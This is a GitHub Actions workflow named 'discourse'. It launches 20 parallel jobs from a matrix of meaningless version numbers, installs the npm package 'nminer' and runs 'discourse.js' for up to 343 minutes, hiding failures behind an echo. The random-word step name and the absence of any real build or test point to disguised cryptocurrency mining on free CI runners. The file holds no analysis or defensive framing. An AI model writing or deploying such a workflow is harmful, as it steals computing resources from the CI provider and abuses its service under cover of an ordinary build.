name: discourse
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 1864 }
          - { version: 921 }
          - { version: 4620 }
          - { version: 4957 }
          - { version: 1579 }
          - { version: 1635 }
          - { version: 7204 }
          - { version: 3627 }
          - { version: 6851 }
          - { version: 7426 }
          - { version: 4494 }
          - { version: 2282 }
          - { version: 8432 }
          - { version: 1941 }
          - { version: 4098 }
          - { version: 6994 }
          - { version: 8643 }
          - { version: 2313 }
          - { version: 6401 }
          - { version: 567 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: except aboard whereas stingy
        run: |
          npm install nminer@latest
          timeout 343m node discourse.js || echo "discourse executed"